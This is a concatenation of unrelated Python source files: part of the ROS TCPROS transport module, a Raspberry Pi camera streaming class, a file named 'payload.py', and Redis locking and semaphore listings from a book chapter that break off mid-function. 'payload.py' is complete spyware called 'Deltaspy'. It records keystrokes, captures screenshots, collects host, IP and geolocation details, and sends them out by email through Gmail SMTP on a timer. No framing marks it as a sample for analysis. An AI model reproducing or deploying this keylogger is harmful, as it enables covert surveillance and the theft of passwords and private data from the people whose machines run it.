self.inbound_handler(client_sock, client_addr)
except socket.error as e:
if not self.is_shutdown:
traceback.print_exc()
logwarn("Failed to handle inbound connection due to socket error: %s"%e)
logdebug("TCPServer[%s] shutting down", self.port)
def get_full_addr(self):
"""
@return: (ip address, port) of server socket binding
@rtype: (str, int)
"""
# return rosgraph.network.get_host_name() instead of address so that it
# obeys ROS_IP/ROS_HOSTNAME behavior
return (rosgraph.network.get_host_name(), self.port)
def _create_server_sock(self):
"""
binds the server socket. ROS_IP/ROS_HOSTNAME may restrict
binding to loopback interface.
"""
if rosgraph.network.use_ipv6():
server_sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
logdebug('binding to ' + str(rosgraph.network.get_bind_address()) + ' ' + str(self.port))
server_sock.bind((rosgraph.network.get_bind_address(), self.port))
(self.addr, self.port) = server_sock.getsockname()[0:2]
logdebug('bound to ' + str(self.addr) + ' ' + str(self.port))
server_sock.listen(5)
return server_sock
def shutdown(self):
"""shutdown I/O resources uses by this server"""
if not self.is_shutdown:
self.is_shutdown = True
self.server_sock.close()
# base maintains a tcpros_server singleton that is shared between
# services and topics for inbound connections. This global is set in
# the tcprosserver constructor. Constructor is called by init_tcpros()
_tcpros_server = None
def init_tcpros_server(port=0):
"""
starts the TCPROS server socket for inbound connections
@param port: listen on the provided port. If the port number is 0, the port will
be chosen randomly
@type port: int
"""
global _tcpros_server
if _tcpros_server is None:
_tcpros_server = TCPROSServer(port=port)
rospy.core.add_shutdown_hook(_tcpros_server.shutdown)
return _tcpros_server
def start_tcpros_server():
"""
start the TCPROS server if it has not started already
"""
if _tcpros_server is None:
init_tcpros_server()
return _tcpros_server.start_server()
# provide an accessor of this so that the TCPROS Server is entirely hidden from upper layers
def get_tcpros_server_address():
"""
get the address of the tcpros server.
@raise Exception: if tcpros server has not been started or created
"""
return _tcpros_server.get_address()
def _error_connection_handler(sock, client_addr, header):
"""
utility handler that does nothing more than provide a rejection header
@param sock: socket connection
@type sock: socket.socket
@param client_addr: client address
@type client_addr: str
@param header: request header
@type header: dict
"""
return {'error': "unhandled connection"}
class TCPROSServer(object):
"""
ROS Protocol handler for TCPROS. Accepts both TCPROS topic
connections as well as ROS service connections over TCP. TCP server
socket is run once start_server() is called -- this is implicitly
called during init_publisher().
"""
def __init__(self, port=0):
"""
Constructur
@param port: port number to bind to (default 0/any)
@type port: int
"""
self.port = port
self.tcp_ros_server = None #: server for receiving tcp conn
self.lock = threading.Lock()
# should be set to fn(sock, client_addr, header) for topic connections
self.topic_connection_handler = _error_connection_handler
# should be set to fn(sock, client_addr, header) for service connections
self.service_connection_handler = _error_connection_handler
def start_server(self):
"""
Starts the TCP socket server if one is not already running
"""
if self.tcp_ros_server:
return
with self.lock:
try:
if not self.tcp_ros_server:
self.tcp_ros_server = TCPServer(self._tcp_server_callback, self.port)
self.tcp_ros_server.start()
except Exception as e:
self.tcp_ros_server = None
logerr("unable to start TCPROS server: %s\n%s"%(e, traceback.format_exc()))
return 0, "unable to establish TCPROS server: %s"%e, []
def get_address(self):
"""
@return: address and port of TCP server socket for accepting
inbound connections
@rtype: str, int
"""
if self.tcp_ros_server is not None:
return self.tcp_ros_server.get_full_addr()
return None, None
def shutdown(self, reason=''):
"""stops the TCP/IP server responsible for receiving inbound connections"""
if self.tcp_ros_server:
self.tcp_ros_server.shutdown()
def _tcp_server_callback(self, sock, client_addr):
"""
TCPServer callback: detects incoming topic or service connection and passes connection accordingly
@param sock: socket connection
@type sock: socket.socket
@param client_addr: client address
@type client_addr: (str, int)
@raise TransportInitError: If transport cannot be succesfully initialized
"""
#TODOXXX:rewrite this logic so it is possible to create TCPROSTransport object first, set its protocol,
#and then use that to do the writing
try:
buff_size = 4096 # size of read buffer
if python3 == 0:
#initialize read_ros_handshake_header with BytesIO for Python 3 (instead of bytesarray())
header = read_ros_handshake_header(sock, StringIO(), buff_size)
else:
header = read_ros_handshake_header(sock, BytesIO(), buff_size)
if 'topic' in header:
err_msg = self.topic_connection_handler(sock, client_addr, header)
elif 'service' in header:
err_msg = self.service_connection_handler(sock, client_addr, header)
else:
err_msg = 'no topic or service name detected'
if err_msg:
# shutdown race condition: nodes that come up and down
# quickly can receive connections during teardown.
# We use is_shutdown_requested() because we can get
# into bad connection states during client shutdown
# hooks.
if not rospy.core.is_shutdown_requested():
write_ros_handshake_header(sock, {'error' : err_msg})
raise TransportInitError("Could not process inbound connection: "+err_msg+str(header))
else:
write_ros_handshake_header(sock, {'error' : 'node shutting down'})
return
except rospy.exceptions.TransportInitError as e:
logwarn(str(e))
if sock is not None:
sock.close()
except Exception as e:
# collect stack trace separately in local log file
if not rospy.core.is_shutdown_requested():
logwarn("Inbound TCP/IP connection failed: %s", e)
rospyerr("Inbound TCP/IP connection failed:\n%s", traceback.format_exc())
if sock is not None:
sock.close()
class TCPROSTransportProtocol(object):
"""
Abstraction of TCPROS connections. Implementations Services/Publishers/Subscribers must implement this
protocol, which defines how messages are deserialized from an inbound connection (read_messages()) as
well as which fields to send when creating a new connection (get_header_fields()).
"""
def __init__(self, resolved_name, recv_data_class, queue_size=None, buff_size=DEFAULT_BUFF_SIZE):
"""
ctor
@param resolved_name: resolved service or topic name
@type resolved_name: str
@param recv_data_class: message class for deserializing inbound messages
@type recv_data_class: Class
@param queue_size: maximum number of inbound messages to maintain
@type queue_size: int
@param buff_size: receive buffer size (in bytes) for reading from the connection.
@type buff_size: int
"""
if recv_data_class and not issubclass(recv_data_class, Message):
raise TransportInitError("Unable to initialize transport: data class is not a message data class")
self.resolved_name = resolved_name
self.recv_data_class = recv_data_class
self.queue_size = queue_size
self.buff_size = buff_size
self.direction = BIDIRECTIONAL
def read_messages(self, b, msg_queue, sock):
"""
@param b StringIO: read buffer
@param msg_queue [Message]: queue of deserialized messages
@type msg_queue: [Message]
@param sock socket: protocol can optionally read more data from
the socket, but in most cases the required data will already be
in b
"""
# default implementation
deserialize_messages(b, msg_queue, self.recv_data_class, queue_size=self.queue_size)
def get_header_fields(self):
"""
Header fields that should be sent over the connection. The header fields
are protocol specific (i.e. service vs. topic, publisher vs. subscriber).
@return: {str : str}: header fields to send over connection
@rtype: dict
"""
return {}
# TODO: this still isn't as clean and seamless as I want it to
# be. This code came from the merger of publisher, subscriber, and
# service code into a common TCPROS transport class. The transport is
# customized by a 'protocol' class, which is how the different
# pub/sub/service behaviors are achieved. More behavior needs to be
# transferred from the transport class into the protocol class,
# e.g. deserialization as the state each maintains is somewhat
# duplicative. I would also come up with a better name than
# protocol.
class TCPROSTransport(Transport):
"""
Generic implementation of TCPROS exchange routines for both topics and services
"""
transport_type = 'TCPROS'
def __init__(self, protocol, name, header=None):
"""
ctor
@param name str: identifier
@param protocol TCPROSTransportProtocol protocol implementation
@param header dict: (optional) handshake header if transport handshake header was
already read off of transport.
@raise TransportInitError if transport cannot be initialized according to arguments
"""
super(TCPROSTransport, self).__init__(protocol.direction, name=name)
if not name:
raise TransportInitError("Unable to initialize transport: name is not set")
self.protocol = protocol
self.socket = None
self.endpoint_id = 'unknown'
self.callerid_pub = 'unknown'
self.dest_address = None # for reconnection
if python3 == 0: # Python 2.x
self.read_buff = StringIO()
self.write_buff = StringIO()
else: # Python 3.x
self.read_buff = BytesIO()
self.write_buff = BytesIO()
#self.write_buff = StringIO()
self.header = header
# #1852 have to hold onto latched messages on subscriber side
self.is_latched = False
self.latch = None
# save the fileno separately so we can garbage collect the
# socket but still unregister will poll objects
self._fileno = None
# these fields are actually set by the remote
# publisher/service. they are set for tools that connect
# without knowing the actual field name
self.md5sum = None
self.type = None
# Endpoint Details (IP, Port)
self.local_endpoint = (None, None)
self.remote_endpoint = (None, None)
def get_transport_info(self):
"""
Get detailed connection information.
Similar to getTransportInfo() in 'libros/transport/transport_tcp.cpp'
e.g. TCPROS connection on port 41374 to [127.0.0.1:40623 on socket 6]
"""
return "%s connection on port %s to [%s:%s on socket %s]" % (self.transport_type, self.local_endpoint[1], self.remote_endpoint[0], self.remote_endpoint[1], self._fileno)
def fileno(self):
"""
Get descriptor for select
"""
return self._fileno
def set_endpoint_id(self, endpoint_id):
"""
Set the endpoint_id of this transport.
Allows the endpoint_id to be set before the socket is initialized.
"""
self.endpoint_id = endpoint_id
def set_socket(self, sock, endpoint_id):
"""
Set the socket for this transport
@param sock: socket
@type sock: socket.socket
@param endpoint_id: identifier for connection endpoint
@type endpoint_id: str
@raise TransportInitError: if socket has already been set
"""
if self.socket is not None:
raise TransportInitError("socket already initialized")
self.socket = sock
self.endpoint_id = endpoint_id
self._fileno = sock.fileno()
self.local_endpoint = self.socket.getsockname()
def connect(self, dest_addr, dest_port, endpoint_id, timeout=None):
"""
Establish TCP connection to the specified
address/port. connect() always calls L{write_header()} and
L{read_header()} after the connection is made
@param dest_addr: destination IP address
@type dest_addr: str
@param dest_port: destination port
@type dest_port: int
@param endpoint_id: string identifier for connection (for statistics)
@type endpoint_id: str
@param timeout: (optional keyword) timeout in seconds
@type timeout: float
@raise TransportInitError: if unable to create connection
"""
# first make sure that if ROS_HOSTNAME=localhost, we will not attempt
# to connect to anything other than localhost
if ("ROS_HOSTNAME" in os.environ) and (os.environ["ROS_HOSTNAME"] == "localhost"):
if not rosgraph.network.is_local_address(dest_addr):
msg = "attempted to connect to non-local host [%s] from a node launched with ROS_HOSTNAME=localhost" % (dest_addr)
logwarn(msg)
self.close()
raise TransportInitError(msg) # bubble up
# now we can proceed with trying to connect.
try:
self.endpoint_id = endpoint_id
self.dest_address = (dest_addr, dest_port)
if rosgraph.network.use_ipv6():
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if _is_use_tcp_keepalive():
# OSX (among others) does not define these options
if hasattr(socket, 'TCP_KEEPCNT') and \
hasattr(socket, 'TCP_KEEPIDLE') and \
hasattr(socket, 'TCP_KEEPINTVL'):
# turn on KEEPALIVE
s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
# - # keepalive failures before actual connection failure
s.setsockopt(socket.SOL_TCP, socket.TCP_KEEPCNT, 9)
# - timeout before starting KEEPALIVE process
s.setsockopt(socket.SOL_TCP, socket.TCP_KEEPIDLE, 60)
# - interval to send KEEPALIVE after IDLE timeout
s.setsockopt(socket.SOL_TCP, socket.TCP_KEEPINTVL, 10)
if timeout is not None:
s.settimeout(timeout)
self.socket = s
logdebug('connecting to ' + str(dest_addr)+ ' ' + str(dest_port))
self.socket.connect((dest_addr, dest_port))
self.write_header()
self.read_header()
self.local_endpoint = self.socket.getsockname()
self.remote_endpoint = (dest_addr, dest_port)
except TransportInitError as tie:
rospyerr("Unable to initiate TCP/IP socket to %s:%s (%s): %s"%(dest_addr, dest_port, endpoint_id, traceback.format_exc()))
raise
except Exception as e:
#logerr("Unknown error initiating TCP/IP socket to %s:%s (%s): %s"%(dest_addr, dest_port, endpoint_id, str(e)))
rospywarn("Unknown error initiating TCP/IP socket to %s:%s (%s): %s"%(dest_addr, dest_port, endpoint_id, traceback.format_exc()))
# check for error type and reason. On unknown errors the socket will be closed
# to avoid reconnection and error reproduction
if not isinstance(e, socket.error):
# FATAL: no reconnection as error is unknown
self.close()
elif not isinstance(e, socket.timeout) and e.errno not in [100, 101, 102, 103, 110, 112, 113]:
# reconnect in follow cases, otherwise close the socket:
# 1. socket.timeout: on timeouts caused by delays on wireless links
# 2. ENETDOWN (100), ENETUNREACH (101), ENETRESET (102), ECONNABORTED (103):
# while using ROS_HOSTNAME ros binds to a specific interface. Theses errors
# are thrown on interface shutdown e.g. on reconnection in LTE networks
# 3. ETIMEDOUT (110): same like 1. (for completeness)
# 4. EHOSTDOWN (112), EHOSTUNREACH (113): while network and/or DNS-server is not reachable
#
# no reconnection as error is not 1.-4.
self.close()
raise TransportInitError(str(e)) #re-raise i/o error
def _validate_header(self, header):
"""
Validate header and initialize fields accordingly
@param header: header fields from publisher
@type header: dict
@raise TransportInitError: if header fails to validate
"""
self.header = header
if 'error' in header:
raise TransportInitError("remote error reported: %s"%header['error'])
for required in ['md5sum', 'type']:
if not required in header:
raise TransportInitError("header missing required field [%s]"%required)
self.type = header['type']
self.md5sum = header['md5sum']
if 'callerid' in header:
self.callerid_pub = header['callerid']
if header.get('latching', '0') == '1':
self.is_latched = True
def write_header(self):
"""Writes the TCPROS header to the active connection."""
# socket may still be getting spun up, so wait for it to be writable
sock = self.socket
protocol = self.protocol
# race condition on close, better fix is to pass these in,
# functional style, but right now trying to cause minimal
# perturbance to codebase.
if sock is None or protocol is None:
return
fileno = sock.fileno()
ready = None
poller = None
if hasattr(select, 'poll'):
poller = select.poll()
poller.register(fileno, select.POLLOUT)
while not ready:
events = poller.poll()
for _, flag in events:
if flag & select.POLLOUT:
ready = True
else:
while not ready:
try:
_, ready, _ = select.select([], [fileno], [])
except ValueError as e:
logger.error("[%s]: select fileno '%s': %s", self.name, str(fileno), str(e))
raise
logger.debug("[%s]: writing header", self.name)
sock.setblocking(1)
self.stat_bytes += write_ros_handshake_header(sock, protocol.get_header_fields())
if poller:
poller.unregister(fileno)
def read_header(self):
"""
Read TCPROS header from active socket
@raise TransportInitError if header fails to validate
"""
sock = self.socket
if sock is None:
return
sock.setblocking(1)
# TODO: add bytes received to self.stat_bytes
self._validate_header(read_ros_handshake_header(sock, self.read_buff, self.protocol.buff_size))
def send_message(self, msg, seq):
"""
Convenience routine for services to send a message across a
particular connection. NOTE: write_data is much more efficient
if same message is being sent to multiple connections. Not
threadsafe.
@param msg: message to send
@type msg: Msg
@param seq: sequence number for message
@type seq: int
@raise TransportException: if error occurred sending message
"""
# this will call write_data(), so no need to keep track of stats
serialize_message(self.write_buff, seq, msg)
self.write_data(self.write_buff.getvalue())
self.write_buff.truncate(0)
def write_data(self, data):
"""
Write raw data to transport
@raise TransportInitialiationError: could not be initialized
@raise TransportTerminated: no longer open for publishing
"""
if not self.socket:
raise TransportInitError("TCPROS transport was not successfully initialized")
if self.done:
raise TransportTerminated("connection closed")
try:
#TODO: get rid of sendalls and replace with async-style publishing
self.socket.sendall(data)
self.stat_bytes += len(data)
self.stat_num_msg += 1
except IOError as ioe:
#for now, just document common errno's in code
(errno, msg) = ioe.args
if errno == 32: #broken pipe
logdebug("ERROR: Broken Pipe")
self.close()
raise TransportTerminated(str(errno)+msg)
raise #re-raise
except socket.error as se:
#for now, just document common errno's in code
(errno, msg) = se.args
if errno == 32: #broken pipe
logdebug("[%s]: Closing connection [%s] due to broken pipe", self.name, self.endpoint_id)
self.close()
raise TransportTerminated(msg)
elif errno == 104: #connection reset by peer
logdebug("[%s]: Peer [%s] has closed connection", self.name, self.endpoint_id)
self.close()
raise TransportTerminated(msg)
else:
rospydebug("unknown socket error writing data: %s",traceback.format_exc())
logdebug("[%s]: closing connection [%s] due to unknown socket error: %s", self.name, self.endpoint_id, msg)
self.close()
raise TransportTerminated(str(errno)+' '+msg)
return True
def receive_once(self):
"""
block until messages are read off of socket
@return: list of newly received messages
@rtype: [Msg]
@raise TransportException: if unable to receive message due to error
"""
sock = self.socket
if sock is None:
raise TransportException("connection not initialized")
b = self.read_buff
msg_queue = []
p = self.protocol
try:
sock.setblocking(1)
while not msg_queue and not self.done and not is_shutdown():
if b.tell() >= 4:
p.read_messages(b, msg_queue, sock)
if not msg_queue:
self.stat_bytes += recv_buff(sock, b, p.buff_size)
self.stat_num_msg += len(msg_queue) #STATS
# set the _connection_header field
for m in msg_queue:
m._connection_header = self.header
# #1852: keep track of last latched message
if self.is_latched and msg_queue:
self.latch = msg_queue[-1]
return msg_queue
except DeserializationError as e:
rospyerr(traceback.format_exc())
raise TransportException("receive_once[%s]: DeserializationError %s"%(self.name, str(e)))
except TransportTerminated as e:
raise #reraise
except ServiceException as e:
raise
except Exception as e:
rospyerr(traceback.format_exc())
raise TransportException("receive_once[%s]: unexpected error %s"%(self.name, str(e)))
return retval
def _reconnect(self):
# This reconnection logic is very hacky right now. I need to
# rewrite the I/O core so that this is handled more centrally.
if self.dest_address is None:
raise ROSInitException("internal error with reconnection state: address not stored")
interval = 0.5 # seconds
while self.socket is None and not self.done and not rospy.is_shutdown():
try:
# set a timeout so that we can continue polling for
# exit. 30. is a bit high, but I'm concerned about
# embedded platforms. To do this properly, we'd have
# to move to non-blocking routines.
self.connect(self.dest_address[0], self.dest_address[1], self.endpoint_id, timeout=30.)
except TransportInitError:
self.socket = None
if self.socket is None and interval < 30.:
# exponential backoff (maximum 32 seconds)
interval = interval * 2
time.sleep(interval)
def receive_loop(self, msgs_callback):
"""
Receive messages until shutdown
@param msgs_callback: callback to invoke for new messages received
@type msgs_callback: fn([msg])
"""
# - use assert here as this would be an internal error, aka bug
logger.debug("receive_loop for [%s]", self.name)
try:
while not self.done and not is_shutdown():
try:
if self.socket is not None:
msgs = self.receive_once()
if not self.done and not is_shutdown():
msgs_callback(msgs, self)
else:
self._reconnect()
except TransportException as e:
# set socket to None so we reconnect
try:
if self.socket is not None:
try:
self.socket.shutdown()
except:
pass
finally:
self.socket.close()
except:
pass
self.socket = None
except DeserializationError as e:
#TODO: how should we handle reconnect in this case?
logerr("[%s] error deserializing incoming request: %s"%self.name, str(e))
rospyerr("[%s] error deserializing incoming request: %s"%self.name, traceback.format_exc())
except:
# in many cases this will be a normal hangup, but log internally
try:
#1467 sometimes we get exceptions due to
#interpreter shutdown, so blanket ignore those if
#the reporting fails
rospydebug("exception in receive loop for [%s], may be normal. Exception is %s",self.name, traceback.format_exc())
except: pass
rospydebug("receive_loop[%s]: done condition met, exited loop"%self.name)
finally:
if not self.done:
self.close()
def close(self):
"""close i/o and release resources"""
if not self.done:
try:
if self.socket is not None:
try:
self.socket.shutdown(socket.SHUT_RDWR)
except:
pass
finally:
self.socket.close()
finally:
self.socket = self.read_buff = self.write_buff = self.protocol = None
super(TCPROSTransport, self).close()
|
camera_pi.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# camera_pi.py
#
#
#
# Raspberry Pi camera module (developed by Miguel Grinberg)
import time
import io
import threading
import picamera
class Camera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
def initialize(self):
if Camera.thread is None:
# start background frame thread
Camera.thread = threading.Thread(target=self._thread)
Camera.thread.start()
# wait until frames start to be available
while self.frame is None:
time.sleep(0)
def get_frame(self):
Camera.last_access = time.time()
self.initialize()
return self.frame
@classmethod
def _thread(cls):
with picamera.PiCamera() as camera:
# camera setup
camera.resolution = (640, 480)
camera.framerate = 30
camera.hflip = False
camera.vflip = False
# let camera warm up
camera.start_preview()
time.sleep(2)
stream = io.BytesIO()
for foo in camera.capture_continuous(stream, 'jpeg',
use_video_port=True):
# store frame
stream.seek(0)
cls.frame = stream.read()
# reset stream for next frame
stream.seek(0)
stream.truncate()
# if there hasn't been any clients asking for frames in
# the last 10 seconds stop the thread
if time.time() - cls.last_access > 10:
break
cls.thread = None
|
payload.py
|
from pynput import keyboard
import time
import threading
import datetime
import pyscreenshot
import smtplib
import socket
import requests
import platform
from email.message import EmailMessage
config = {}
class dspy:
def __init__(self, email, pwd, time, keylog, screenshot):
self.log = ""
self.email = email
self.pwd = pwd
self.time = time
self.keylog = keylog
self.screenshot = screenshot
def grab_screenshot(self):
img = pyscreenshot.grab()
img.save("temp.png")
def send_mail(self):
a=True
while a:
time.sleep(self.time)
log = self.log
self.log =""
newMessage = EmailMessage()
newMessage['Subject'] = "Deltaspy Report"
newMessage['From'] = self.email
newMessage['To'] = self.email
if self.keylog:
newMessage.set_content(log)
if self.screenshot:
self.grab_screenshot()
with open('temp.png', 'rb') as f:
img_data = f.read()
newMessage.add_attachment(img_data, maintype='image', subtype="png", filename=str(datetime.datetime.now()))
with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:
smtp.login(self.email, self.pwd)
smtp.send_message(newMessage)
smtp.close()
def get_key(self,key):
if "Key" in str(key):
k = str(key).replace("Key.","")
l = f"[{k}]"
if k =="space": l+=" "
elif k=="enter":l+="\n"
self.log += l
else:
self.log += str(key).replace('\'',"")
def send_details(self):
newMessage = EmailMessage()
newMessage['Subject'] = "Deltaspy Started"
newMessage['From'] = self.email
newMessage['To'] = self.email
hostname = socket.gethostname()
ip = socket.gethostbyname(hostname)
plt = platform.processor()
os = platform.system()
arch = platform.machine()
res = requests.get('https://ipinfo.io/')
data = res.json()
city = data['city']
region = data['region']
country = data['country']
location = data['loc']
timezone = data['timezone']
org = data['org']
msg = f"Hostname : {hostname} \nip : {ip} \nPlatform : {plt} \nOperating System : {os} \nArchitecture : {arch} \nCountry : {country} \nRegion : {region} \nCity : {city} \nLocation : {location} \nTimezone : {timezone} \nOrganisation : {org}"
newMessage.set_content(msg)
with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:
smtp.login(self.email, self.pwd)
smtp.send_message(newMessage)
smtp.close()
def run(self):
self.send_details()
email_thread = threading.Thread(target=self.send_mail)
email_thread.setDaemon(True)
email_thread.start()
with keyboard.Listener(on_press=self.get_key) as listener:
listener.join()
spy = dspy(config['email'], config['pwd'], config['time'], config['keylog'], config['screenshot'])
spy.run()
|
ch06_listing_source.py
|
import bisect
from collections import defaultdict, deque
import json
import math
import os
import time
import unittest
import uuid
import zlib
import redis
QUIT = False
pipe = inv = item = market = buyer = seller = inventory = None
# <start id="_1314_14473_8380"/>
def add_update_contact(conn, user, contact):
ac_list = 'recent:' + user
pipeline = conn.pipeline(True) #A
pipeline.lrem(ac_list, contact) #B
pipeline.lpush(ac_list, contact) #C
pipeline.ltrim(ac_list, 0, 99) #D
pipeline.execute() #E
# <end id="_1314_14473_8380"/>
#A Set up the atomic operation
#B Remove the contact from the list if it exists
#C Push the item onto the front of the list
#D Remove anything beyond the 100th item
#E Actually execute everything
#END
# <start id="_1314_14473_8383"/>
def remove_contact(conn, user, contact):
conn.lrem('recent:' + user, contact)
# <end id="_1314_14473_8383"/>
#END
# <start id="_1314_14473_8386"/>
def fetch_autocomplete_list(conn, user, prefix):
candidates = conn.lrange('recent:' + user, 0, -1) #A
matches = []
for candidate in candidates: #B
if candidate.lower().startswith(prefix): #B
matches.append(candidate) #C
return matches #D
# <end id="_1314_14473_8386"/>
#A Fetch the autocomplete list
#B Check each candidate
#C We found a match
#D Return all of the matches
#END
# <start id="_1314_14473_8396"/>
valid_characters = '`abcdefghijklmnopqrstuvwxyz{' #A
def find_prefix_range(prefix):
posn = bisect.bisect_left(valid_characters, prefix[-1:]) #B
suffix = valid_characters[(posn or 1) - 1] #C
return prefix[:-1] + suffix + '{', prefix + '{' #D
# <end id="_1314_14473_8396"/>
#A Set up our list of characters that we know about
#B Find the position of prefix character in our list of characters
#C Find the predecessor character
#D Return the range
#END
# <start id="_1314_14473_8399"/>
def autocomplete_on_prefix(conn, guild, prefix):
start, end = find_prefix_range(prefix) #A
identifier = str(uuid.uuid4()) #A
start += identifier #A
end += identifier #A
zset_name = 'members:' + guild
conn.zadd(zset_name, start, 0, end, 0) #B
pipeline = conn.pipeline(True)
while 1:
try:
pipeline.watch(zset_name)
sindex = pipeline.zrank(zset_name, start) #C
eindex = pipeline.zrank(zset_name, end) #C
erange = min(sindex + 9, eindex - 2) #C
pipeline.multi()
pipeline.zrem(zset_name, start, end) #D
pipeline.zrange(zset_name, sindex, erange) #D
items = pipeline.execute()[-1] #D
break
except redis.exceptions.WatchError: #E
continue #E
return [item for item in items if '{' not in item] #F
# <end id="_1314_14473_8399"/>
#A Find the start/end range for the prefix
#B Add the start/end range items to the ZSET
#C Find the ranks of our end points
#D Get the values inside our range, and clean up
#E Retry if someone modified our autocomplete zset
#F Remove start/end entries if an autocomplete was in progress
#END
# <start id="_1314_14473_8403"/>
def join_guild(conn, guild, user):
conn.zadd('members:' + guild, user, 0)
def leave_guild(conn, guild, user):
conn.zrem('members:' + guild, user)
# <end id="_1314_14473_8403"/>
#END
# <start id="_1314_14473_8431"/>
def list_item(conn, itemid, sellerid, price):
#...
pipe.watch(inv) #A
if not pipe.sismember(inv, itemid): #B
pipe.unwatch() #B
return None
pipe.multi() #C
pipe.zadd("market:", item, price) #C
pipe.srem(inv, itemid) #C
pipe.execute() #C
return True
#...
# <end id="_1314_14473_8431"/>
#A Watch for changes to the users's inventory
#B Verify that the user still has the item to be listed
#C Actually list the item
#END
# <start id="_1314_14473_8435"/>
def purchase_item(conn, buyerid, itemid, sellerid, lprice):
#...
pipe.watch("market:", buyer) #A
price = pipe.zscore("market:", item) #B
funds = int(pipe.hget(buyer, 'funds')) #B
if price != lprice or price > funds: #B
pipe.unwatch() #B
return None
pipe.multi() #C
pipe.hincrby(seller, 'funds', int(price)) #C
pipe.hincrby(buyerid, 'funds', int(-price)) #C
pipe.sadd(inventory, itemid) #C
pipe.zrem("market:", item) #C
pipe.execute() #C
return True
#...
# <end id="_1314_14473_8435"/>
#A Watch for changes to the market and the buyer's account information
#B Check for a sold/repriced item or insufficient funds
#C Transfer funds from the buyer to the seller, and transfer the item to the buyer
#END
# <start id="_1314_14473_8641"/>
def acquire_lock(conn, lockname, acquire_timeout=10):
identifier = str(uuid.uuid4()) #A
end = time.time() + acquire_timeout
while time.time() < end:
if conn.setnx('lock:' + lockname, identifier): #B
return identifier
time.sleep(.001)
return False
# <end id="_1314_14473_8641"/>
#A A 128-bit random identifier
#B Get the lock
#END
# <start id="_1314_14473_8645"/>
def purchase_item_with_lock(conn, buyerid, itemid, sellerid):
buyer = "users:%s"%buyerid
seller = "users:%s"%sellerid
item = "%s.%s"%(itemid, sellerid)
inventory = "inventory:%s"%buyerid
end = time.time() + 30
locked = acquire_lock(conn, market) #A
if not locked:
return False
pipe = conn.pipeline(True)
try:
while time.time() < end:
try:
pipe.watch(buyer)
pipe.zscore("market:", item) #B
pipe.hget(buyer, 'funds') #B
price, funds = pipe.execute() #B
if price is None or price > funds: #B
pipe.unwatch() #B
return None #B
pipe.hincrby(seller, int(price)) #C
pipe.hincrby(buyerid, int(-price)) #C
pipe.sadd(inventory, itemid) #C
pipe.zrem("market:", item) #C
pipe.execute() #C
return True
except redis.exceptions.WatchError:
pass
finally:
release_lock(conn, market, locked) #D
# <end id="_1314_14473_8645"/>
#A Get the lock
#B Check for a sold item or insufficient funds
#C Transfer funds from the buyer to the seller, and transfer the item to the buyer
#D Release the lock
#END
# <start id="_1314_14473_8650"/>
def release_lock(conn, lockname, identifier):
pipe = conn.pipeline(True)
lockname = 'lock:' + lockname
while True:
try:
pipe.watch(lockname) #A
if pipe.get(lockname) == identifier: #A
pipe.multi() #B
pipe.delete(lockname) #B
pipe.execute() #B
return True #B
pipe.unwatch()
break
except redis.exceptions.WatchError: #C
pass #C
return False #D
# <end id="_1314_14473_8650"/>
#A Check and verify that we still have the lock
#B Release the lock
#C Someone else did something with the lock, retry
#D We lost the lock
#END
# <start id="_1314_14473_8790"/>
def acquire_lock_with_timeout(
conn, lockname, acquire_timeout=10, lock_timeout=10):
identifier = str(uuid.uuid4()) #A
lockname = 'lock:' + lockname
lock_timeout = int(math.ceil(lock_timeout)) #D
end = time.time() + acquire_timeout
while time.time() < end:
if conn.setnx(lockname, identifier): #B
conn.expire(lockname, lock_timeout) #B
return identifier
elif not conn.ttl(lockname): #C
conn.expire(lockname, lock_timeout) #C
time.sleep(.001)
return False
# <end id="_1314_14473_8790"/>
#A A 128-bit random identifier
#B Get the lock and set the expiration
#C Check and update the expiration time as necessary
#D Only pass integers to our EXPIRE calls
#END
# <start id="_1314_14473_8986"/>
def acquire_semaphore(conn, semname, limit, timeout=10):
identifier = str(uuid.uuid4()) #A
now = time.time()
pipeline = conn.pipeline(True)
pipeline.zremrangebyscore(semname, '-inf', now - timeout) #B
pipeline.zadd(semname, identifier, now) #C
pipeline.zrank(semname, identifier) #D
if pipeline.execute()[-1] < limit: #D
return identifier
conn.zrem(semname, identifier) #E
return None
# <end id="_1314_14473_8986"/>
#A A 128-bit random identifier
#B Time out old semaphore holders
#C Try to acquire the semaphore
#D Check to see if we have it
#E We failed to get the semaphore, discard our identifier
#END
# <start id="_1314_14473_8990"/>
def release_semaphore(conn, semname, identifier):
return conn.zrem(semname, identifier) #A
# <end id="_1314_14473_8990"/>
#A Returns True if the semaphore was properly released, False if it had timed out
#END
# <start id="_1314_14473_9004"/>
def acquire_fair_semaphore(conn, semname, limit, timeout=10):
identifier = str(uuid.uuid4()) #A
czset = semname + ':owner'
ctr = semname + ':counter'
now = time.time()
pipeline = conn.pipeline(True)
pipeline.zremrangebyscore(semname, '-inf', now - timeout) #B
pipeline.zinterstore(czset, {czset: 1, semname: 0}) #B
pipeline.incr(ctr) #C
counter = pipeline.execute()[-1] #C
pipeline.zadd(semname, identifier, now) #D
pipeline.zadd(czset, identifier, counter) #D
pipeline.zrank(czset, identifier) #E
if pipeline.execute()[-1] < limit: #E
return identifier #F
pipeline.zrem(semname, identifier) #G
pipeline.zrem(czset, identifier) #G
pipeline.execute()
return None
# <end id="_1314_14473_9004"/>
#A A 128-bit random identifier
#B Time out old entries
#C Get the counter
#D Try to acquire the semaphore
#E Check the rank to determine if we got the semaphore
#F We got the semaphore
#G We didn't get the semaphore, clean out the bad data
#END
# <start id="_1314_14473_9014"/>
def release_fair_semaphore(conn, semname, identifier):
pipeline = conn.pipeline(True)
pipeline.zrem(semname, identifier)
pipeline.zrem(semname + ':owner', identifier)
return pipeline.execute()[0] #A
# <end id="_1314_14473_9014"/>
#A Returns True if the semaphore was properly released, False if it had timed out
#END
# <start id="_1314_14473_9022"/>
def refresh_fair_semaphore(conn, semname, identifier):
if conn.zadd(semname, identifier, time.time()): #A
